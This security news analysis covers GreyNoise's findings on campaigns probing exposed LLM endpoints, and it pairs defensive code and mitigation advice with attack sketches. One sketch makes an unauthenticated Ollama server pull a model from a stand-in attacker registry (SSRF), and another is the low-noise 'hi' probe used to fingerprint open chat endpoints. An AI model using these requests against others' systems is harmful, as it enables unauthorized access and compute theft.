The digital landscape surrounding generative artificial intelligence (AI) is rapidly evolving, and with that evolution comes a burgeoning attack surface. A recent detailed analysis from threat intelligence firm GreyNoise has illuminated a systematic and sustained campaign targeting vulnerable entry points into commercial Large Language Model (LLM) services. Threat actors are actively sweeping the internet, leveraging misconfigured proxy servers and improperly secured API gateways to gain unauthorized access to paid AI resources, effectively attempting to harvest computational cycles and potentially sensitive data flows without incurring legitimate usage costs.
This concerted effort, which began in earnest in late December, is not a scattershot attack but a methodical reconnaissance operation. GreyNoise telemetry recorded probing activity across more than 73 distinct LLM endpoints, generating over 80,000 interaction sessions against its monitored honeypots. The sophistication lies in the subtlety of the approach: the actors employ "low-noise prompts"—minimalist or innocuous queries—designed to elicit a response from the target endpoint. This technique is crucial for fingerprinting the specific AI model being accessed (e.g., GPT-4, Claude, Gemini) without triggering the anomaly detection systems often implemented by LLM providers or enterprise security teams.
The Dual Nature of the Threat Landscape
GreyNoise’s monitoring, particularly through its honeypots emulating Ollama—an open-source framework popular for running LLMs locally—captured a staggering 91,403 adversarial events over the last four months, segmented into two distinct campaigns. This dual-campaign structure offers critical insight into the varied motivations present in the AI security domain.
The first operation, commencing in October and remaining persistently active, exhibited characteristics suggestive of security researchers or dedicated bug bounty hunters, often referred to as "grey-hat" actors. This campaign demonstrated a clear exploitation vector targeting Server-Side Request Forgery (SSRF) vulnerabilities. SSRF flaws permit an attacker to coerce a vulnerable server into making requests to arbitrary external infrastructure controlled by the attacker. In this instance, the actors leveraged the model pull functionality inherent in the Ollama framework. By injecting malicious registry Uniform Resource Locators (URLs) or embedding Twilio SMS webhook integrations via the MediaURL parameter, they attempted to pivot the compromised server’s network connection outward.
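The pattern is easiest to see in a concrete request. The Python sketch below shows how the model-pull endpoint of an unauthenticated, internet-reachable Ollama instance can become an SSRF primitive when the requested model name points at an attacker-controlled registry. The host names here are hypothetical placeholders; the /api/pull path and "model" field follow Ollama's public API documentation (older versions used "name"), so verify against the version you run.

```python
import json
import urllib.request

# Illustrative sketch only: how a model-pull request becomes an SSRF primitive
# when an Ollama instance is reachable without authentication.
# Hostnames below are hypothetical placeholders.
OLLAMA_HOST = "http://exposed-ollama.internal:11434"   # hypothetical exposed instance
ATTACKER_REGISTRY = "registry.attacker.example"        # hypothetical attacker-controlled host

# Asking the server to pull "registry.attacker.example/library/foo" forces it
# to open an outbound connection to the attacker's registry, the kind of
# callback that OAST listeners are built to catch.
payload = json.dumps({"model": f"{ATTACKER_REGISTRY}/library/foo"}).encode()

req = urllib.request.Request(
    f"{OLLAMA_HOST}/api/pull",
    data=payload,
    headers={"Content-Type": "application/json"},
    method="POST",
)

try:
    with urllib.request.urlopen(req, timeout=10) as resp:
        print(resp.status, resp.read(200))
except Exception as exc:
    print("pull attempt failed:", exc)
```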

The identification of ProjectDiscovery’s Out-of-Band Application Security Testing (OAST) infrastructure as the destination for callbacks strongly supports the grey-hat hypothesis. OAST tools are standard fare in contemporary vulnerability assessment, designed to confirm successful exploitation of flaws like SSRF by forcing the vulnerable server to make an outbound request to the scanner’s listener. However, as GreyNoise noted in its analysis, the sheer scale of the activity, particularly the spike of 1,688 sessions over just 48 hours around the Christmas holiday, suggests an aggressive boundary-testing mentality beyond typical responsible disclosure efforts. The campaign originated from 62 IP addresses spanning 27 countries, infrastructure characteristic of Virtual Private Servers (VPS) rather than of the distributed, botnet-like hosting associated with purely malicious operations.
The Escalation: Organized Enumeration for Profit
The second, more alarming campaign began later, on December 28th, and focused exclusively on high-volume enumeration. This operation involved only two IP addresses systematically testing over 73 unique LLM endpoints. The methodology here was purely reconnaissance-focused, probing endpoints formatted for compatibility with major commercial APIs, including those mimicking OpenAI and Google Gemini structures.
The list of targeted models, while not fully enumerated in initial reports, is understood to encompass the major proprietary offerings that require significant capital investment to access at scale. The attackers’ goal was clear: map out the available, unsecured gateways to commercial LLM compute power.
The evasion tactic employed during this enumeration phase is particularly noteworthy. To remain under the radar of rate limiting and automated abuse detection, the actors substituted typical malicious payloads with benign inputs: short greetings, empty strings, or simple factual queries. These inputs are sufficient to confirm an active, responsive LLM endpoint without producing the complex or repetitive token usage that security monitoring tools typically flag.
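For defenders, it helps to know what such a probe looks like on the wire. The following Python sketch reproduces the shape of a low-noise probe against an OpenAI-compatible chat endpoint; the gateway URL is a hypothetical placeholder, and the request body mirrors the /v1/chat/completions format.

```python
import json
import urllib.request

# Sketch of the "low-noise" probe pattern: a single, trivially short prompt
# sent to an OpenAI-compatible chat endpoint. The gateway URL is hypothetical.
GATEWAY = "https://llm-gateway.example.com"   # hypothetical exposed proxy

probe = {
    "model": "gpt-4o",            # any model name the proxy will forward
    "messages": [{"role": "user", "content": "hi"}],
    "max_tokens": 5,              # tiny completion keeps token usage negligible
}

req = urllib.request.Request(
    f"{GATEWAY}/v1/chat/completions",
    data=json.dumps(probe).encode(),
    headers={"Content-Type": "application/json"},
    method="POST",
)

# Any successful response confirms a live, unauthenticated LLM endpoint; the
# reply's model field and formatting are enough to fingerprint the backing provider.
try:
    with urllib.request.urlopen(req, timeout=10) as resp:
        print(resp.status, json.loads(resp.read()).get("model"))
except Exception as exc:
    print("no usable endpoint:", exc)
```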
The infrastructure associated with this second scanning effort has previously been linked to broad-spectrum vulnerability exploitation campaigns. This historical context shifts the interpretation from mere security research to organized preparatory work for large-scale abuse. While GreyNoise’s current data does not confirm post-discovery exploitation—such as data exfiltration or direct monetization of the accessed models—the investment implicit in generating 80,000 targeted requests is substantial. As researchers caution, actors do not invest this level of effort in infrastructure mapping unless they have concrete plans to capitalize on the discovered assets.

Industry Implications: The Cost of Unmanaged AI Endpoints
The proliferation of LLMs has introduced a paradigm shift in enterprise IT security. Historically, perimeter defense focused on ingress/egress control for standard web traffic and data centers. Now, every deployed LLM service, whether internally hosted via frameworks like Ollama or accessed via API gateways, represents a new, often poorly inventoried, network endpoint.
This vulnerability stems from the speed of adoption outpacing security maturity. Organizations rushed to integrate LLMs for internal tools, customer service, or code generation, often deploying them behind network configurations intended for traditional applications. Misconfigured proxies, load balancers, or cloud-native API gateways can inadvertently expose these endpoints to the public internet, bypassing necessary authentication or throttling mechanisms.
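A sensible first step is simply knowing which of your own gateways answer without credentials. The Python sketch below walks a hypothetical inventory of internal endpoint URLs and reports any that return a successful response to an unauthenticated request against the OpenAI-compatible /v1/models listing path.

```python
import urllib.request
import urllib.error

# Quick self-audit sketch: check which of your own LLM gateways answer an
# unauthenticated request. The URLs below stand in for an internal inventory.
INVENTORY = [
    "https://llm-proxy.corp.example/v1/models",
    "https://chat-gateway.corp.example/v1/models",
]

for url in INVENTORY:
    try:
        with urllib.request.urlopen(url, timeout=5) as resp:
            # A success without any API key means the gateway is exposed in
            # exactly the way the enumeration campaign is looking for.
            print(f"EXPOSED  {url} -> {resp.status}")
    except urllib.error.HTTPError as err:
        print(f"ok       {url} -> {err.code} (auth or policy enforced)")
    except Exception as exc:
        print(f"error    {url} -> {exc}")
```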
The primary financial implication is cost absorption. If an attacker successfully uses an exposed endpoint to run complex inference tasks—such as data summarization, code generation, or sophisticated prompt chaining—the legitimate owner of the API key or service account bears the substantial compute cost. For enterprises utilizing high-tier models, a sustained attack could result in tens of thousands of dollars in unexpected charges monthly.
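The arithmetic gets there quickly. As a rough illustration, with assumed per-token prices (not any provider's actual rate card) and a sustained abuse pattern against a single exposed key:

```python
# Back-of-the-envelope cost estimate; the per-token prices below are purely
# illustrative assumptions, not any provider's actual pricing.
PRICE_PER_1K_INPUT = 0.01    # USD, assumed
PRICE_PER_1K_OUTPUT = 0.03   # USD, assumed

requests_per_day = 50_000    # sustained abuse of one exposed key, assumed
avg_input_tokens = 1_500     # e.g., summarization prompts
avg_output_tokens = 500

daily = requests_per_day * (
    avg_input_tokens / 1000 * PRICE_PER_1K_INPUT
    + avg_output_tokens / 1000 * PRICE_PER_1K_OUTPUT
)
print(f"~${daily:,.0f}/day, ~${daily * 30:,.0f}/month absorbed by the key owner")
```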
Beyond direct financial loss, there are significant risks concerning intellectual property and data leakage. If an internal application connects a vulnerable LLM proxy to proprietary databases or sensitive internal documentation (a common practice for Retrieval-Augmented Generation, or RAG, systems), an attacker confirming endpoint access gains a potential vector for probing those connected data sources, even if the LLM itself is sandboxed.
Expert Analysis: The Shifting Definition of an Attack Surface
From a cybersecurity architecture perspective, this trend underscores the failure of relying on perimeter defenses alone in the age of distributed cloud services and AI integration. Security professionals must now treat LLM gateways as specialized network entry points requiring granular control.
The use of low-noise enumeration techniques highlights an arms race between attackers and AI platform providers. As providers enhance anomaly detection based on token usage patterns or query complexity, attackers adapt by using statistically insignificant queries that mimic legitimate, low-volume user interaction. This necessitates a shift toward context-aware security analysis, looking beyond simple request volume to behavioral patterns and network signatures.
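One way to operationalize that shift is to score clients on behavior rather than volume. The sketch below, with purely illustrative thresholds, flags clients that touch many distinct endpoints while sending uniformly tiny prompts, which is the signature of low-noise enumeration even at modest request counts.

```python
from collections import defaultdict
from dataclasses import dataclass

@dataclass
class Request:
    client: str        # source identifier (IP, API key, JA4 hash, etc.)
    endpoint: str      # which LLM route was hit
    prompt_chars: int  # size of the submitted prompt

def flag_enumeration(requests, min_endpoints=10, max_avg_prompt=16):
    """Flag clients with high endpoint diversity but uniformly tiny prompts."""
    by_client = defaultdict(list)
    for r in requests:
        by_client[r.client].append(r)

    flagged = []
    for client, reqs in by_client.items():
        endpoints = {r.endpoint for r in reqs}
        avg_len = sum(r.prompt_chars for r in reqs) / len(reqs)
        # Many distinct endpoints plus trivially short prompts reads as
        # reconnaissance, even when raw request volume stays under rate limits.
        if len(endpoints) >= min_endpoints and avg_len <= max_avg_prompt:
            flagged.append(client)
    return flagged
```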
The observed reliance on VPS infrastructure rather than dedicated botnets suggests that the actors are prioritizing anonymity and agility over raw speed. VPS providers are often slower to respond to abuse complaints than large-scale hosting providers typically utilized by botnets, affording the attackers a longer operational window for their reconnaissance mapping.
Future Trajectory and Mitigation Strategies
The findings serve as a clear warning that the mapping phase of LLM-focused attacks is underway. It is highly probable that the intelligence gathered from these 80,000 sessions will be weaponized in subsequent campaigns focused on exploitation, data exfiltration, or sustained cost-theft operations.
To effectively counter these evolving threats, a multi-layered defensive posture is essential:
- Strict Egress Control and Trust Boundaries: For environments running local LLM frameworks like Ollama, administrators must rigorously restrict model pulling functionality. Only whitelisted, trusted model registries should be permitted for outbound connections. Egress filtering must be applied at the network level to prevent unauthorized callbacks, effectively closing the SSRF exploitation path identified in the first campaign.
- API Gateway Hardening: All external-facing LLM endpoints must be treated with the same scrutiny as critical authentication portals. This mandates strict rate limiting based on IP, API key usage, and token volume (see the sketch after this list). Furthermore, deploying Web Application Firewalls (WAFs) configured to detect known prompt injection patterns or unusual API key usage is critical, even against "low-noise" queries.
- Network Fingerprinting and Anomaly Detection: Security Operations Centers (SOCs) need to integrate advanced network telemetry. Monitoring for JA4 fingerprints—derived from the TLS client hello, which reveals the specific libraries and tooling used to establish a connection—can help identify automated scanning tools associated with vulnerability research frameworks, even when the payload itself is benign. Traffic originating from ASN ranges associated with known adversarial VPS providers should also be prioritized for scrutiny.
- Adoption of Standardized Security Protocols: The industry’s move toward standards like the Model Context Protocol (MCP) for secure LLM orchestration is a positive step. Organizations adopting these emerging frameworks must ensure that security best practices—such as granular authorization and least-privilege access for AI agents—are embedded from the initial deployment phase, not bolted on later.
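As a concrete illustration of the gateway-hardening point above, the following minimal token-bucket sketch rate-limits by API key and charges each request by its expected token volume. Capacity and refill values are illustrative; a production gateway would keep buckets in shared storage rather than process memory.

```python
import time

class TokenBucket:
    """Minimal token bucket; capacity and refill rate are illustrative."""

    def __init__(self, capacity: int, refill_per_sec: float):
        self.capacity = capacity
        self.tokens = float(capacity)
        self.refill_per_sec = refill_per_sec
        self.last = time.monotonic()

    def allow(self, cost: int = 1) -> bool:
        now = time.monotonic()
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.refill_per_sec)
        self.last = now
        if self.tokens >= cost:
            self.tokens -= cost
            return True
        return False

buckets: dict[str, TokenBucket] = {}

def admit(api_key: str, token_cost: int) -> bool:
    # Charge each request by its expected token volume, not just request count,
    # so low-noise probes and heavyweight completions are throttled consistently.
    bucket = buckets.setdefault(api_key, TokenBucket(capacity=10_000, refill_per_sec=50))
    return bucket.allow(token_cost)
```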
In conclusion, the organized enumeration targeting misconfigured LLM proxies is a definitive indicator that the AI ecosystem is now a primary target for opportunistic and sophisticated threat actors alike. The race is on to secure these new computational frontiers before the gathered reconnaissance maps are converted into active, costly breaches.
